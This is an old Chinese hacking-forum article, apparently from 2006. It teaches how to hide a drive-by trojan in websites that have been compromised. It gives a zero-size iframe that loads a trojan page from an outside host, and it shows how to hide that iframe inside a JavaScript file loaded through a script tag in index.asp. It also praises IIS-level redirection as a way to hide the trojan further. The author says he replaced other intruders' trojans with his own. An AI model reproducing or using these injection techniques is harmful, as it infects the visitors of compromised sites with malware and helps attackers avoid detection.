获取邀请码 | 基地首页 | 基地文章 | 基地动画 | 基地软件 | 技术论坛 | 会员学院
 
 
热门搜索:安全 安全工具 网络安全 会员培训 CMS建站网 安全
攻防总结免费资源网赚文章网管技巧防火墙技术端口入侵Sniffer嗅探arp技术
DDOS攻防3389攻防灰鸽子文章逆向工程破解实例加密技术脱壳技术溢出漏洞
serv-u漏洞社会工程学渗透技术跨站技术提权技术
 您现在的位置: 新世纪网安基地 >> 文章 >> 网络技巧 >> 文章正文
教你一招新的网页隐蔽挂马方式
作者:未知    文章来源:www.520hack.com    点击数:    更新时间:2006-3-25


教你一招新的网页隐蔽挂马方式


今天没事找了些WEBSHELL发现有很多都以给别人先占了坐打开INDEX.ASP发现<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>,早被人挂了马儿,不过把他的代马删掉换上我的就可以了,相信大多数人挂马都会用<iframe src=http://XXXXXX/jiaozhu.htm width=0 height=0></iframe>,这样的代码, 不过这样是很容易就被人发现了, 今天我教你一招隐蔽的对初学者是很有用哦注意看下面代码:

首先在自己的电脑建个文本文档TXT写入document.write("<iframe <iframe src=http://你的木马路经/tzd.htm width=0 height=0></iframe>");然后将文件另存为一个JS的扩展名这样你的JS文件就生成了然后将你的JS文件上传到空间后那你在INDEX.ASP挂马的代码就可以这用写<script language=javascript src=你的.js></script>或在不一个目录下<script language=javascript src=http://xxxxxxxxx/1.js></script>加在主页代码多的地方是不是看不出什么哦,下面我给大家举个例子,我把我的JS取名问1.JS将他上传到wwww.123.com主页目录下然后我在主页的INDEX.ASP中加入代码为<script language=javascript src=1.js></script>这样就可以了
我就不做动画教程了大家按我说明一步一步做就可以了只是利用了javascript的JS脚本呵呵

服务器挂马
这里简单说一个比较狠的吧.重定向任何调用的htm,js,等文件,只要是执行的如图:

这种方法在计算中用搜索关键词是搜索不到的,反正本地怎么找也找不到。。谁能想到是在iis里设置的呢?而且调用文件那么多,怎么知道是重定向的那个文件呢?反正现在想不到有什么好方法可以解决,如果服务器如上图被挂马了,偶最好的建议是重装IIS 
挂马很多种多动脑筋让马儿更隐藏

『关闭该页』 『打印该页』

  • 上一篇文章:
  • 责任编辑:Wangtianxiang 
  • 下一篇文章:
  • 最近更新
    推荐文章黑客横行,教你设个陷阱
    推荐文章批处理学习完全教程
    推荐文章安全技巧:检查自己的
    推荐文章多种方法:揪出隐藏在电
    推荐文章介绍一种通过的个人电
    推荐文章SEO专家祝鹏:浅谈SEO
    推荐文章王通:让网络销售疯狂
    推荐文章三步让你录制的动画体
    推荐文章深度解析:IE7 0Day 漏
    推荐文章Google AdSense 账户最
    热门文章
    普通文章教你如何轻松解密Md5密
    普通文章查看加密空间日志最新
    普通文章利用SQL命令开启3389
    普通文章解除网吧限止11法小节
    普通文章两句代码使卡巴、360自
    推荐文章批处理学习完全教程
    普通文章菜鸟:看看骇客怎么给你
    普通文章腾讯发布第三代QQ
    普通文章女大学生宋雅丹淘宝开
    普通文章CMD下加sql账号:黑客
    相关文章
    如何得到别人的上网帐号
    如何成为一名黑客?
    饶过Xplog70.dll玩入侵
    让木马、病毒不被杀
    让XP肉鸡终端服务实现多
    轻轻松松穿透防火墙
    聊天室:如何在闲聊屋踢人
    利用httptunel突破防火墙
    经典攻击入侵手段
    建造永不被杀的80端口后
    黑客快速入门(强烈推荐)
    关于我们 | 加入会员 | 网安商城 | 投稿方法 | 广告报价| 友情连接 | 网站地图 | 网安论坛网安招聘 |Java
    加入会员咨询QQ:65444425 投稿方法: 广告与合作QQ:9324223

    浙ICP备06031184号